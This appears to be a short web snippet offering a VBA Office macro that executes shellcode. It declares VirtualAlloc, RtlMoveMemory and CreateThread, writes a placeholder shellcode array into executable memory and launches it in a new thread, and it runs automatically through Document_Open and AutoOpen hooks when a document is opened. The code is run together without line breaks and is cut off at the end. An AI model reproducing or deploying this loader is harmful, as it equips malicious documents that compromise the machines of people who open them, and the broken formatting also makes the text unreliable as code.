This is a simple implementation of a shellcode execution which uses VirtualAlloc, CreateThread, and RtlMoveMemory to execute shellcode.
Private Declare PtrSafe Function CreateThread Lib "KERNEL32" (ByVal SecurityAttributesAs Long, ByVal StackSize As Long, ByVal StartFunction As LongPtr, ThreadParameter AsLongPtr, ByVal CreateFlags As Long, ByRef ThreadId As Long) As LongPtrPrivate Declare PtrSafe Function VirtualAlloc Lib "KERNEL32" (ByVal lpAddress AsLongPtr, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect AsLong) As LongPtrPrivate Declare PtrSafe Function RtlMoveMemory Lib "KERNEL32" (ByVal lDestination AsLongPtr, ByRef sSource As Any, ByVal lLength As Long) As LongPtrFunctionMyMacro() Dim buf As Variant Dim addr As LongPtr Dim counter As Long Dim data As Long Dim res As Long buf = Array(shellcode array) addr = VirtualAlloc(0, UBound(buf), &H3000, &H40) For counter = LBound(buf) To UBound(buf) data = buf(counter) res = RtlMoveMemory(addr + counter, data, 1) Next counter res = CreateThread(0, 0, addr, 0, 0, 0)End FunctionSub Document_Open() MyMacroEnd SubSub AutoOpen() MyMacr
